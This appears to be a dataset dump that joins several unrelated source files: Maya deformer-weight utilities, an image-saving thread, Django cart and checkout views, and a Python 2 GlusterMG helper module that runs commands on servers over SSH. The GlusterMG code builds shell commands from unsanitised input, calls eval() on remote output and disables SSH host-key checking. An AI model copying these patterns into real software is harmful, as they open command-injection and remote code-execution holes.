# Check direct mesh (outMesh -> inMesh) connection
if str(cmds.objectType(inMeshConn[0])) == 'mesh':
return inMeshConn[0]
# Find connected deformer
deformerObj = dUtils.getMObject(inMeshConn[0])
if not deformerObj.hasFn(om.MFn.kGeometryFilt):
deformerHist = cmds.ls(cmds.listHistory(shape), type='geometryFilter')
if not deformerHist:
print('findInputShape.py: Shape node "'+shape +
'" has incoming inMesh connections but is not affected by any valid deformers! Returning "'+shape+'"!')
return shape
#raise Exception('Shape node "'+shape+'" is not affected by any valid deformers!')
else:
deformerObj = dUtils.getMObject(deformerHist[0])
# Get deformer function set
deformerFn = oma.MFnGeometryFilter(deformerObj)
# Get input shape for deformer
shapeObj = dUtils.getMObject(shape)
geomIndex = deformerFn.indexForOutputShape(shapeObj)
inputShapeObj = deformerFn.inputShapeAtIndex(geomIndex)
# Return result
return om.MFnDependencyNode(inputShapeObj).name()
def renameDeformerSet(deformer, deformerSetName=''):
'''
Rename the deformer set connected to the specified deformer
@param deformer: Name of the deformer whose deformer set you want to rename
@type deformer: str
@param deformerSetName: New name for the deformer set. If left as default, new name will be (deformer+"Set")
@type deformerSetName: str
'''
# Verify input
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Check deformer set name
if not deformerSetName:
deformerSetName = deformer+'Set'
# Rename deformer set
deformerSet = cmds.listConnections(
deformer+'.message', type='objectSet')[0]
if deformerSet != deformerSetName:
deformerSetName = cmds.rename(deformerSet, deformerSetName)
# Retrun result
return deformerSetName
def getWeights(deformer, geometry=None):
# Check Deformer
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Check Geometry
if not geometry:
geometry = getAffectedGeometry(deformer).keys()[0]
# Get Geometry Shape
geoShape = geometry
if geometry and cmds.objectType(geoShape) == 'transform':
geoShape = cmds.listRelatives(geometry, s=True, ni=True)[0]
'''
weightList = []
vCount = cmds.polyEvaluate(geometry,v=True)
for i in range(vCount):
w = cmds.getAttr("{0}.weightList[0].weights[{1}]".format(deformer,i))
weightList.append(w)
'''
# get deformer set
defomerObjOLD = dUtils.getMObjectOld(deformer)
deformerFn = OpenMayaAnimOld.MFnGeometryFilter(defomerObjOLD)
deformerSetObj = deformerFn.deformerSet()
deformerSetName = OpenMayaOld.MFnDependencyNode(deformerSetObj).name()
deformerSetObj = dUtils.getMObjectOld(deformerSetName)
deformerSetFn = OpenMayaOld.MFnSet(deformerSetObj)
deformerSetSel = OpenMayaOld.MSelectionList()
deformerSetFn.getMembers(deformerSetSel, True)
deformerSetPath = OpenMayaOld.MDagPath()
deformerSetComp = OpenMayaOld.MObject()
deformerSetSel.getDagPath(0, deformerSetPath, deformerSetComp)
# Get weights
deformerFn = OpenMayaAnimOld.MFnWeightGeometryFilter(defomerObjOLD)
weightList = OpenMayaOld.MFloatArray()
deformerFn.getWeights(deformerSetPath, deformerSetComp, weightList)
# Return result
return list(weightList)
def setWeights(deformer, weights, geometry=None):
# Check Deformer
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Check Geometry
if not geometry:
geometry = getAffectedGeometry(deformer).keys()[0]
# Get Geometry Shape
geoShape = geometry
if geometry:
geoShape = cmds.listRelatives(geometry, s=True, ni=True)[0]
# Build weight array
weightList = OpenMayaOld.MFloatArray()
[weightList.append(i) for i in weights]
defomerObjOLD = dUtils.getMObjectOld(deformer)
# get deformer set
deformerFn = OpenMayaAnimOld.MFnGeometryFilter(defomerObjOLD)
deformerSetObj = deformerFn.deformerSet()
deformerSetName = OpenMayaOld.MFnDependencyNode(deformerSetObj).name()
deformerSetObj = dUtils.getMObjectOld(deformerSetName)
deformerSetFn = OpenMayaOld.MFnSet(deformerSetObj)
deformerSetSel = OpenMayaOld.MSelectionList()
deformerSetFn.getMembers(deformerSetSel, True)
deformerSetPath = OpenMayaOld.MDagPath()
deformerSetComp = OpenMayaOld.MObject()
deformerSetSel.getDagPath(0, deformerSetPath, deformerSetComp)
deformerFn = OpenMayaAnimOld.MFnWeightGeometryFilter(defomerObjOLD)
deformerFn.setWeight(deformerSetPath, deformerSetComp, weightList)
def bindPreMatrix(deformer, bindPreMatrix='', parent=True):
'''
Create a bindPreMatrix transform for the specified deformer.
@param deformer: Deformer to create bind pre matrix transform for
@type deformer: str
@param bindPreMatrix: Specify existing transform for bind pre matrix connection. If empty, create a new transform
@type bindPreMatrix: str
@param parent: Parent the deformer handle to the bind pre matrix transform
@type deformer: bool
'''
# Check deformer
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
if not cmds.objExists(deformer+'.bindPreMatrix'):
raise Exception('Deformer "'+deformer +
'" does not accept bindPreMatrix connections!')
# Get deformer handle
deformerHandle = cmds.listConnections(deformer+'.matrix', s=True, d=False)
if deformerHandle:
deformerHandle = deformerHandle[0]
else:
raise Exception('Unable to find deformer handle!')
# Check bindPreMatrix
if bindPreMatrix:
if not cmds.objExists(bindPreMatrix):
bindPreMatrix = cmds.createNode('transform', n=bindPreMatrix)
else:
# Build bindPreMatrix transform
prefix = deformerHandle.replace(deformerHandle.split('_')[-1], '')
bindPreMatrix = cmds.createNode('transform', n=prefix+'bindPreMatrix')
# Match transform and pivot
cmds.xform(bindPreMatrix, ws=True, matrix=cmds.xform(
deformerHandle, q=True, ws=True, matrix=True))
cmds.xform(bindPreMatrix, ws=True, piv=cmds.xform(
deformerHandle, q=True, ws=True, rp=True))
# Connect inverse matrix to localize cluster
cmds.connectAttr(
bindPreMatrix+'.worldInverseMatrix[0]', deformer+'.bindPreMatrix', f=True)
# Parent
if parent:
cmds.parent(deformerHandle, bindPreMatrix)
# Return result
return bindPreMatrix
def pruneWeights(deformer, geoList=[], threshold=0.001):
'''
Set deformer component weights to 0.0 if the original weight value is below the set threshold
@param deformer: Deformer to removed components from
@type deformer: str
@param geoList: The geometry objects whose components are checked for weight pruning
@type geoList: list
@param threshold: The weight threshold for removal
@type threshold: str
'''
# Check deformer
if not cmds.objExists(deformer):
raise Exception('Deformer "'+deformer+'" does not exist!')
# Check geometry
if type(geoList) == str:
geoList = [geoList]
if not geoList:
geoList = cmds.deformer(deformer, q=True, g=True)
if not geoList:
raise Exception('No geometry to prune weight for!')
for geo in geoList:
if not cmds.objExists(geo):
raise Exception('Geometry "'+geo+'" does not exist!')
# For each geometry
for geo in geoList:
# Get deformer member indices
memberIndexList = getDeformerSetMemberIndices(deformer, geo)
# Get weight list
weightList = getWeights(deformer, geo)
# Prune weights
pWeightList = [wt if wt > threshold else 0.0 for wt in weightList]
# Apply pruned weight list
setWeights(deformer, pWeightList, geo)
def pruneMembershipByWeights(deformer, geoList=[], threshold=0.001):
'''
Remove components from a specified deformer set if there weight value is below the set threshold
@param deformer: Deformer to removed components from
@type deformer: str
@param geoList: The geometry objects whose components are checked for removal
@type geoList: list
@param threshold: The weight threshold for removal
@type threshold: str
'''
# Check deformer
if not cmds.objExists(deformer):
raise Exception('Deformer "'+deformer+'" does not exist!')
# Check geometry
if type(geoList) == str:
geoList = [geoList]
if not geoList:
geoList = cmds.deformer(deformer, q=True, g=True)
if not geoList:
raise Exception('No geometry to prune weight for!')
for geo in geoList:
if not cmds.objExists(geo):
raise Exception('Geometry "'+geo+'" does not exist!')
# Get deformer set
deformerSet = getDeformerSet(deformer)
# For each geometry
allPruneList = []
for geo in geoList:
# Get Component Type
geoType = glTools.utils.geometry.componentType(geo)
# Get Deformer Member Indices
memberIndexList = getDeformerSetMemberIndices(deformer, geo)
# Get Weights
weightList = getWeights(deformer, geo)
# Get Prune List
pruneList = [memberIndexList[i] for i in range(
len(memberIndexList)) if weightList[i] <= threshold]
for i in range(len(pruneList)):
if type(pruneList[i]) == str or type(pruneList[i]) == unicode or type(pruneList[i]) == int:
pruneList[i] = '['+str(pruneList[i])+']'
elif type(pruneList[i]) == list:
pruneList[i] = [str(p) for p in pruneList[i]]
pruneList[i] = '['+']['.join(pruneList[i])+']'
pruneList[i] = geo+'.'+geoType+str(pruneList[i])
allPruneList.extend(pruneList)
# Prune deformer set membership
if pruneList:
cmds.sets(pruneList, rm=deformerSet)
# Return prune list
return allPruneList
def clean(deformer, threshold=0.001):
'''
Clean specified deformer.
Prune weights under the given tolerance and prune membership.
@param deformer: The deformer to clean.
@type deformer: str
@param threshold: Weight value tolerance for prune operations.
@type threshold: float
'''
# Print Message
print('Cleaning deformer: '+deformer+'!')
# Check Deformer
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Prune Weights
glTools.utils.deformer.pruneWeights(deformer, threshold=threshold)
# Prune Membership
glTools.utils.deformer.pruneMembershipByWeights(
deformer, threshold=threshold)
def checkMultipleOutputs(deformer, printResult=True):
'''
Check the specified deformer for multiple ouput connections from a single plug.
@param deformer: Deformer to check for multiple output connections
@type deformer: str
@param printResult: Print results to the script editor
@type printResult: bool
'''
# Check deformer
if not isDeformer(deformer):
raise Exception('Deformer "'+deformer+'" is not a valid deformer!')
# Get outputGeometry plug
outGeomPlug = glTools.utils.attribute.getAttrMPlug(
deformer+'.outputGeometry')
if not outGeomPlug.isArray():
raise Exception('Attribute "'+deformer +
'.outputGeometry" is not an array attribute!')
# Get existing indices
indexList = om.MIntArray()
numIndex = outGeomPlug.getExistingArrayAttributeIndices(indexList)
# Check output plugs
returnDict = {}
for i in range(numIndex):
plugConn = cmds.listConnections(
deformer+'.outputGeometry['+str(indexList[i])+']', s=False, d=True, p=True)
# Check multiple outputs
if len(plugConn) > 1:
# Append to return value
returnDict[deformer+'.outputGeometry[' +
str(indexList[i])+']'] = plugConn
# Print connection info
if printResult:
print('Deformer output "'+deformer+'.outputGeometry['+str(
indexList[i])+']" has '+str(len(plugConn))+' outgoing connections:')
for conn in plugConn:
print('\t- '+conn)
# Return result
return returnDict
| 24,456 | 7,421 |
import logging
import os
from queue import Queue
from threading import Thread
from time import time
import cv2
class SaveThread(Thread):
def __init__(self, queue):
Thread.__init__(self)
self.queue = queue
def run(self):
while True:
# Get the work from the queue and expand the tuple
save_path, im = self.queue.get()
try:
cv2.imwrite(save_path, im)
finally:
self.queue.task_done()
class SaveImageWorker:
def __init__(self):
self.save_queue = Queue()
self.save_thread = SaveThread(self.save_queue)
self.save_thread.daemon = True
self.save_thread.start()
def save_image(self, save_path, im):
self.save_queue.put((save_path, im)) | 804 | 229 |
# Licensed under an MIT style license -- see LICENSE.md
from .utils import (
gw_results_file, functions, history_dictionary, command_line_arguments
)
__author__ = ["Charlie Hoy <charlie.hoy@ligo.org>"]
| 208 | 72 |
from django.shortcuts import render, get_object_or_404, redirect
from django.contrib import messages
from django.utils import timezone
from django.views.generic import ListView, DetailView, View
from .models import Item, Order, OrderItem, Address, Promo
from .forms import AddressForm, PromoForm
from django.http import HttpResponseRedirect
from django.core.mail import send_mail
class HomeView(ListView):
model = Item
template_name = 'home.html'
class ProductDetail(DetailView):
model = Item
template_name = 'product.html'
class OrderSummaryView(View):
def get(self, *args, **kwargs):
order = Order.objects.get(user=self.request.user, ordered=False)
context = {
'order': order
}
return render(self.request, 'order_summary.html', context)
def add_to_cart(request, slug):
item = get_object_or_404(Item, slug=slug)
order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
order_qs = Order.objects.filter(user=request.user, ordered=False)
if order_qs.exists():
order = order_qs[0]
if order.items.filter(item__slug=item.slug).exists():
messages.success(request, f"{item.title} ya esta en el carrito")
return redirect('product', slug=slug)
else:
order.items.add(order_item)
order.save()
messages.success(request, f"{item.title} fue anadido al carrito")
return redirect('product', slug=slug)
else:
ordered_date = timezone.now()
order = Order.objects.create(user=request.user, ordered=False, ordered_date=ordered_date)
order.items.add(order_item)
order.save()
messages.success(request, f"{item.title} fue anadido al carrito")
return redirect('product', slug=slug)
def remove_from_cart(request, slug):
item = get_object_or_404(Item, slug=slug)
order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
order_qs = Order.objects.filter(user=request.user, ordered=False)
if order_qs.exists():
order = order_qs[0]
if order.items.filter(item__slug=item.slug).exists():
OrderItem.objects.filter(id=order_item.id).delete()
messages.warning(request, f"{item.title} fue eliminado del carrito")
return redirect('product', slug=slug)
else:
messages.warning(request, f"{item.title} no esta en el carrito")
return redirect('product', slug=slug)
else:
messages.warning(request, f"{item.title} no hay una orden activa")
return redirect('product', slug=slug)
def add_item_quantity(request, slug):
item = get_object_or_404(Item, slug=slug)
order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
order_item.quantity += 1
order_item.save()
return redirect('order_summary')
def remove_item_quantity(request, slug):
item = get_object_or_404(Item, slug=slug)
order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
order_qs = Order.objects.filter(user=request.user, ordered=False)
order = order_qs[0]
if order_item.quantity > 1:
order_item.quantity -= 1
order_item.save()
else:
order.items.remove(order_item)
order.save()
messages.warning(request, f"{item.title} fue eliminado del carrito")
return redirect('order_summary')
def remove_from_cart_summary(request, slug):
item = get_object_or_404(Item, slug=slug)
order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
order_qs = Order.objects.filter(user=request.user, ordered=False)
order = order_qs[0]
OrderItem.objects.filter(id=order_item.id).delete()
messages.warning(request, f"{item.title} el producto fue eliminado del carrito")
return redirect('order_summary')
class AfterCheckoutView(DetailView):
def get(self, *args, **kwargs):
order = Order.objects.get(user=self.request.user, ordered=False)
context = {
'order': order
}
return render(self.request, 'after_checkout.html', context)
class CheckoutView(View):
def get(self, *args, **kwargs):
form = AddressForm()
order = Order.objects.get(user=self.request.user, ordered=False)
context = {
'form': form,
'order': order,
}
return render(self.request, 'checkout.html', context)
def post(self, *args, **kwargs):
order = Order.objects.get(user=self.request.user, ordered=False)
form = AddressForm(self.request.POST or None)
context = {}
#promo_form = PromoForm(self.request.POST or None)
if 'submit_promo' in self.request.POST:
if form.is_valid():
promo_code = form.cleaned_data.get('promo_code')
promo = Promo.objects.filter(title=promo_code)
if promo:
order.promo.clear()
order.promo.add(promo[0])
order.save()
else:
order.promo.clear()
order.save()
messages.warning(self.request, f"{promo_code} no es un codigo valido de promociรณn")
if 'submit_info' in self.request.POST:
if form.is_valid():
first_name = form.cleaned_data.get('first_name')
last_name = form.cleaned_data.get('last_name')
phone = form.cleaned_data.get('phone')
email = form.cleaned_data.get('email')
street_address = form.cleaned_data.get('street_address')
street_address_2 = form.cleaned_data.get('street_address_2')
save_info = form.cleaned_data.get('save_info')
default = form.cleaned_data.get('default')
use_default = form.cleaned_data.get('use_default')
state_option = form.cleaned_data.get('state_option')
payment_option = form.cleaned_data.get('payment_option')
# Create address and save it
address = Address(
user=self.request.user,
street_address=street_address,
street_address_2=street_address_2,
state_option=state_option,
)
address.save()
# Print form data
print(form.cleaned_data)
# Send emails
subject = 'Mascarillas y mas - Su orden fue recibida'
message = f'ยกGracias por ordenar!\n{first_name} {last_name} Su orden fue recibida. Lo antes posible alguien lo estara contactando para confirmar su orden.'
from_email = 'chandler240@gmail.com'
recipient_list = [email,]
send_mail(subject, message, from_email, recipient_list)
return redirect('after_checkout')
else:
# Check errors
# print(form.errors)
messages.warning(self.request, "Los campos Nombre, Apellido, Telefono y Email son necesarios")
# always return an address
return redirect('checkout')
| 7,444 | 2,164 |
# Copyright (C) 2011 Gluster, Inc. <http://www.gluster.com>
# This file is part of Gluster Management Gateway (GlusterMG).
#
# GlusterMG is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation; either version 3 of the License,
# or (at your option) any later version.
#
# GlusterMG is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
import os
import sys
p1 = os.path.abspath(os.path.dirname(sys.argv[0]))
p2 = "%s/common" % os.path.dirname(p1)
if not p1 in sys.path:
sys.path.append(p1)
if not p2 in sys.path:
sys.path.append(p2)
import re
import syslog
import subprocess
import time
import tempfile
import glob
import commands
import paramiko
import Globals
import XmlHandler
RUN_COMMAND_ERROR = -1024
LOG_SYSLOG = 1
SYSLOG_REQUIRED = False
LOG_FILE_NAME = None
LOG_FILE_OBJ = None
logOpened = False
sshCommandPrefix = "ssh -l root -q -i /opt/glustermg/keys/gluster.pem -o BatchMode=yes -o GSSAPIAuthentication=no -o PasswordAuthentication=no -o StrictHostKeyChecking=no".split()
sshCommandPrefixShell = "ssh -l root -q -i /opt/glustermg/keys/gluster.pem -o BatchMode=yes -o GSSAPIAuthentication=no -o PasswordAuthentication=no -o StrictHostKeyChecking=no"
try:
commandPath = "/opt/glustermg/%s/backend" % os.environ['GMG_VERSION']
except KeyError, e:
commandPath = "/opt/glustermg/2.4/backend"
def log(priority, message=None):
global logOpened
if not logOpened:
syslog.openlog(os.path.basename(sys.argv[0]))
logOpened = True
if type(priority) == type(""):
logPriority = syslog.LOG_INFO
logMessage = priority
else:
logPriority = priority
logMessage = message
if not logMessage:
return
#if Globals.DEBUG:
# sys.stderr.write(logMessage)
else:
syslog.syslog(logPriority, logMessage)
return
def isString(value):
return (type(value) == type("") or type(value) == type(u""))
def getTempFileName():
filedesc, filename = tempfile.mkstemp(prefix="GSP_")
os.close(filedesc)
return filename
def readFile(fileName, lines=False):
content = None
try:
fp = open(fileName)
if lines:
content = fp.readlines()
else:
content = fp.read()
fp.close()
return content
except IOError, e:
log("failed to read file %s: %s" % (fileName, str(e)))
if lines:
return []
else:
return ""
def writeFile(fileName, content):
try:
fp = open(fileName, "w")
if isString(content):
fp.write(content)
elif type(content) == type([]):
fp.writelines(content)
fp.close()
return True
except IOError, e:
log("failed to write file %s: %s" % (fileName, str(e)))
return False
def removeFile(fileName, root=False):
if not os.path.exists(fileName):
return True
if root:
if runCommand("rm %s" % fileName, root=True) == 0:
return True
return False
try:
os.remove(fileName)
return True
except OSError, e:
log("Failed to remove file %s: %s" % (fileName, str(e)))
return False
def runCommandBG(command, stdinFileObj=None, stdoutFileObj=None, stderrFileObj=None,
shell=False, root=None):
if shell:
if not isString(command):
return None
else:
if isString(command):
command = command.split()
if root == True:
if shell:
command = "sudo " + command
else:
command = ['sudo'] + command
elif isString(root):
if shell:
command = "sudo -u " + root + " " + command
else:
command = ['sudo', '-u', root] + command
if not stdinFileObj:
stdinFileObj=subprocess.PIPE
if not stdoutFileObj:
stdoutFileObj=subprocess.PIPE
if not stderrFileObj:
stderrFileObj=subprocess.PIPE
try:
process = subprocess.Popen(command,
bufsize=-1,
stdin=stdinFileObj,
stdout=stdoutFileObj,
stderr=stderrFileObj,
shell=shell)
return process
except OSError, e:
log("runCommandBG(): Failed to run command [%s]: %s" % (command, e))
return None
def runCommand(command,
input='', output=False,
shell=False, root=None):
rv = {}
rv["Status"] = RUN_COMMAND_ERROR
rv["Stdout"] = None
rv["Stderr"] = None
try:
stdinFileName = getTempFileName()
stdinFileObj = open(stdinFileName, "w")
stdinFileObj.write(input)
stdinFileObj.close()
stdinFileObj = open(stdinFileName, "r")
stdoutFileName = getTempFileName()
stdoutFileObj = open(stdoutFileName, "w")
stderrFileName = getTempFileName()
stderrFileObj = open(stderrFileName, "w")
except IOError, e:
log("Failed to create temporary file for executing command [%s]: %s" % (command, e))
if output:
return rv
return rv["Status"]
stdoutContent = None
stderrContent = None
process = runCommandBG(command,
stdinFileObj=stdinFileObj,
stdoutFileObj=stdoutFileObj,
stderrFileObj=stderrFileObj,
shell=shell, root=root)
if process:
rv['Status'] = process.wait()
rv['Stdout'] = readFile(stdoutFileName)
rv['Stderr'] = readFile(stderrFileName)
os.remove(stdinFileName)
os.remove(stdoutFileName)
os.remove(stderrFileName)
if output:
return rv
return rv["Status"]
def daemonize():
try:
pid = os.fork()
if pid > 0:
# exit first parent
sys.exit(0)
except OSError, e:
#sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))
return False
# decouple from parent environment
os.chdir("/")
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent
sys.exit(0)
except OSError, e:
#sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror))
return False
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = file("/dev/null", 'r')
so = file("/dev/null", 'a+')
se = file("/dev/null", 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
return True
def getMeminfo():
lines = readFile("/proc/meminfo", lines=True)
re_parser = re.compile(r'^(?P<key>\S*):\s*(?P<value>\d*)\s*kB' )
result = {}
for line in lines:
match = re_parser.match(line)
if not match:
continue # skip lines that don't parse
key, value = match.groups(['key', 'value'])
result[key] = int(value)
result['MemUsed'] = (result['MemTotal'] - result['MemFree'] - result['Buffers'] - result['Cached'])
return result
def _getCpuStatList():
lines = readFile("/proc/stat", lines=True)
if not lines:
return None
return map(float, lines[0].split()[1:5])
def getCpuUsageAvg():
st1 = _getCpuStatList()
#time1 = time.time()
time.sleep(1)
st2 = _getCpuStatList()
#time2 = time.time()
if not (st1 and st2):
return None
usageTime = (st2[0] - st1[0]) + (st2[1] - st1[1]) + (st2[2] - st1[2])
try:
return (100.0 * usageTime) / (usageTime + (st2[3] - st1[3]))
except ZeroDivisionError, e:
return 0
def convertKbToMb(kb):
return kb / 1024.0
def getDeviceFormatStatusFile(device):
return "/var/tmp/format_%s.status" % device.replace('/', '_')
def getDeviceFormatLockFile(device):
return "/var/lock/format_%s.lock" % device.replace('/', '_')
def getDeviceFormatOutputFile(device):
return "/var/tmp/format_%s.out" % device.replace('/', '_')
def getGlusterVersion():
rv = runCommand("/usr/sbin/gluster --version", output=True)
if rv["Stderr"]:
return None
if rv["Status"] != 0:
return None
if not rv["Stdout"]:
return None
return rv["Stdout"].strip().split()[1]
def getCifsUserUid(userName):
lines = readFile(Globals.CIFS_USER_FILE, lines=True)
for line in lines:
if not line.strip():
continue
tokens = line.strip().split(":")
if tokens[1] == userName:
return int(tokens[0])
return None
def grunOfOutput(serverFile, command, argumentList=[]):
output = []
commandList = ["%s/%s" % (commandPath, command)] + argumentList
## junli.li - get rid of white lines
serverNameListTmp = readFile(serverFile, lines=True)
serverNameList = []
for serverName in serverNameListTmp:
if serverName.strip():
serverNameList.append(serverName)
if not serverNameList:
return []
status = True
for serverName in serverNameList:
rv = runCommand(sshCommandPrefix + [serverName.strip()] + commandList, output=True)
# if rv["Status"] != 0:
# sys.stderr.write("%s: %s\n" % (serverName.strip(), rv["Status"]))
# sys.stderr.write("Stdout:\n%s\n" % rv["Stdout"])
# sys.stderr.write("Stderr:\n%s\n" % rv["Stderr"])
# sys.stderr.write("---\n")
# status = False
# else :
# junli.li - only get the bricks info from good nodes
if rv["Status"] == 0:
output = output + eval(rv["Stdout"])
# if status:
return output
# else:
# return 2
def grun(serverFile, command, argumentList=[]):
commandList = ["%s/%s" % (commandPath, command)] + argumentList
## junli.li - get rid of white lines
serverNameListTmp = readFile(serverFile, lines=True)
serverNameList = []
for serverName in serverNameListTmp:
if serverName.strip():
serverNameList.append(serverName)
if not serverNameList:
return 1
status = True
for serverName in serverNameList:
rv = runCommand(sshCommandPrefix + [serverName.strip()] + commandList, output=True)
if rv["Status"] != 0:
sys.stderr.write("%s: %s\n" % (serverName.strip(), rv["Status"]))
sys.stderr.write("Stdout:\n%s\n" % rv["Stdout"])
sys.stderr.write("Stderr:\n%s\n" % rv["Stderr"])
sys.stderr.write("---\n")
status = False
if status:
return 0
else:
return 2
def grunAddCifsUser(serverFile, command, argumentList):
commandList = "%s/%s" % (commandPath, command) + " " + argumentList[0] + " " + argumentList[1] + " " + "`cat " + argumentList[2] + "`"
## junli.li - get rid of white lines
serverNameListTmp = readFile(serverFile, lines=True)
serverNameList = []
for serverName in serverNameListTmp:
if serverName.strip():
serverNameList.append(serverName)
if not serverNameList:
return 1
status = True
for serverName in serverNameList:
rv = runCommand(sshCommandPrefixShell + " " + serverName.strip() + " " + commandList , shell=True, output=True)
if rv["Status"] != 0:
sys.stderr.write("%s: %s\n" % (serverName.strip(), rv["Status"]))
sys.stderr.write("Stdout:\n%s\n" % rv["Stdout"])
sys.stderr.write("Stderr:\n%s\n" % rv["Stderr"])
sys.stderr.write("---\n")
status = False
if status:
return 0
else:
return 2
def grunChangeCifsUserPasswd(serverFile, command, argumentList):
commandList = "%s/%s" % (commandPath, command) + " " + argumentList[0] + " `cat " + argumentList[1] + "`"
## junli.li - get rid of white lines
serverNameListTmp = readFile(serverFile, lines=True)
serverNameList = []
for serverName in serverNameListTmp:
if serverName.strip():
serverNameList.append(serverName)
if not serverNameList:
return 1
status = True
for serverName in serverNameList:
rv = runCommand(sshCommandPrefixShell + " " + serverName.strip() + " " + commandList , shell=True, output=True)
if rv["Status"] != 0:
sys.stderr.write("%s: %s\n" % (serverName.strip(), rv["Status"]))
sys.stderr.write("Stdout:\n%s\n" % rv["Stdout"])
sys.stderr.write("Stderr:\n%s\n" % rv["Stderr"])
sys.stderr.write("---\n")
status = False
if status:
return 0
else:
return 2
def getFileSystemType():
return [os.path.basename(i).split('.')[1] for i in glob.glob("/sbin/mkfs.*")]
##########added by bin.liu 2013-4-27
def executeOnServer(serverName,commandWithArgs):
if isLocalHost(serverName) == True:
(status, message) = commands.getstatusoutput(commandWithArgs)
if status:
return 1, message
return status,message
output = ''
try:
ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
except Exception,e:
return -2,'Error when using pub key to connect remote host [%s]' % str(e)
try:
key = paramiko.RSAKey.from_private_key_file(Globals.PKEYFILE)
ssh.connect(serverName, Globals.PORT, Globals.USERNAME, pkey=key)
stdin,stdout,stderr = ssh.exec_command(commandWithArgs)
output = stdout.read()
ssh.close()
strerr = stderr.read()
if strerr is None or strerr.strip() is '':
return 0,output
return 1,strerr
except Exception,e:
return -1,"cannot connect " + serverName +': '+ str(e)
def executeWithPasswd(serverName,cmd):
try:
ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
except Exception,e:
return -2, 'Error when using pub key to connect remote host %s' % str(e)
try:
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(serverName, Globals.PORT, Globals.USERNAME,Globals.DEFAULT_PASSWD)
stdin, stdout, stderr = ssh.exec_command(cmd)
ret = stdout.read()
strerr = stderr.read()
if strerr is None or strerr.strip() is '':
return 0,ret
return 1, strerr
except Exception,e:
return -1,'can not connect to server [%s]:%s' % serverName, str(e)
def installPubKey(serverName):
if isLocalHost(serverName):
return '0', 'local host'
if os.path.exists(Globals.PUBKEYFILE)==False:
return '26060', Globals.PUBKEYFILE + ' does not exist.'
key = os.popen('cat ' + Globals.PUBKEYFILE).read()
key = key.replace('\n',' ')
cmd = '''echo ''' + key + ''' >> ''' + Globals.SSH_AUTHORIZED_KEYS_PATH_REMOTE
status,output = executeWithPasswd(serverName,cmd)
if status == -1:
return '26104', output
elif status == -2:
return '26059', 'Error when using pub key to connect remote server [%s].[%s]' % serverName, output
elif status == 1:
return '26062', 'error when installing keys on server [%s]. %s' % serverName, output
return '0',''
def isOnline(serverName):
hostName = os.popen("hostname").read()
if hostName.strip() == serverName:
return True
port = 22
username = 'root'
pkey_file = Globals.PKEYFILE
try:
key = paramiko.RSAKey.from_private_key_file(pkey_file)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.load_system_host_keys()
ssh.connect(serverName, Globals.PORT, Globals.USERNAME,Globals.DEFAULT_PASSWD)
return True
except Exception,e:
return False
def errorCode(code, msg, params):
responseDom = XmlHandler.ResponseXml()
errorTag = responseDom.appendTagRoute("error")
errorTag.appendChild(responseDom.createTag("code",code))
errorTag.appendChild(responseDom.createTag("msg",msg))
if params is not None:
for param in params:
errorTag.appendChild(responseDom.createTag("param",param))
return errorTag.toxml()
def isEmpty(var):
if var is None:
return True
elif str(var).strip() is '':
return True
return False
def isLocalHost(serverName):
hostName = os.popen('hostname').read().split('\n')[0]
stats, ip = getLocal_IP()
host = os.popen('cat /etc/hosts | grep ' + ip.strip()).read()
if (serverName.strip() == hostName.strip()) or \
(serverName.strip() == 'localhost') or \
(serverName.strip() == '127.0.0.1') or \
(ip == serverName):
return True
return False
def isIPAddr(serverName):
ip="\\b((?!\\d\\d\\d)\\d+|1\\d\\d|2[0-4]\\d|25[0-5])\\.((?!\\d\\d\\d)\\d+|1\\d\\d|2[0-4]\\d|25[0-5])\\.((?!\\d\\d\\d)\\d+|1\\d\\d|2[0-4]\\d|25[0-5])\\.((?!\\d\\d\\d)\\d+|1\\d\\d|2[0-4]\\d|25[0-5])\\b"
if re.match(ip,serverName) is None:
return False
return True
def getIPByName(serverName):
if isIPAddr(serverName):
return serverName
return os.popen('cat /etc/hosts | grep ' + serverName).read().replace('\t',' ').split(' ')[0]
def getHosts(serverName):
cmd = 'gluster peer status|grep Hostname'
status,output = executeOnServer(serverName ,cmd)
if status:
return status, output
list = output.split('\n')
hosts = []
hosts.append(serverName)
for str1 in list:
lst = str1.split(':')
if len(lst)==2:
status, host = executeOnServer(serverName,'cat /etc/hosts | grep ' + lst[1])
if status:
return status, host
if host is None or host.strip() is '':
continue
hostName = host.replace('\t',' ').split(' ')[1]
hosts.append(hostName)
else:
break
return 0,hosts
def getLocal_IP():
cmd = "ifconfig|grep inet|grep -v inet6|grep Bcast|cut -d ':' -f2|cut -d ' ' -f1|awk 'NR==1'"
status,output = commands.getstatusoutput(cmd)
return status,output
def rebalanceTaskStart(clusterName, volumeName):
references = volumeName
